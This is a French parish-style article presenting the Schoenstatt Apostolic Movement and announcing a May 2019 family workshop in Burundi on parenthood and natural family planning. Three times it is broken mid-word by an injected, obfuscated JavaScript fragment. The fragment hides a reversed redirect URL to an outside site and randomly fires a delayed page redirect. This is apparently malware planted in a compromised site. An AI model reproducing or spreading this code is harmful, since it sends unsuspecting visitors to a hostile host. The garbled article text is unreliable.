Le Mouvement Apostolique de Schoenstatt est une communauté catholique regroupant des laïcs et des personnes consacrées (Prêtres, Religieuses, Célibataires consacrées). Les membres de ce Mouvement sont repartis en trois branches : la Branche masculine, la Branches féminine et l’Œuvre des Familles de Schoenstatt(OFS). Le besoin de conjuguer les vérités de la foi avec les exigences des temps et la nécessité a été ressenti très vite par le Fondateur du Mouvement, pour atteindre, son objectif primordial de former un homme nouveau dans la communauté nouvelle.

Les membres de cette branche de l’Œuvre des Familles de Schoenstatt se sont toof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}donnés comme vision d’être les témoins du Christ dans leurs foyers et communautés comme le Père Joseph Kentenich.

Dans l’objectif de bien murir l’idée de la volonté de Dieu pour la famille ainsi que comprendre profondément la noble mission des parents en famille, la branche de l’OFS au Burundi  a préparé pour toutes les familles un atelier de formation. Les participants seront informés sur les difficultés que rencontrent dans nos jours les parents dans leur mission, et connaitre dignement leur devoir. Pour comprendre davantage que la fécondité est un bien, un toof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}don, une fin du mariage,  le Planning Familial Naturel(PFN) leurs sera sur le plat. En toof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}donnant la vie, les époux participent à la paternité de Dieu.

Les thèmes seront développés au Mont Sion Gikungu le samedi 25mai 2019, dans la salle Saint Vincent Pâlotte à partir de 9heures et demie.

Sont invités les conjoints.

Brigitte IRAKOZE

Laisser un commentaire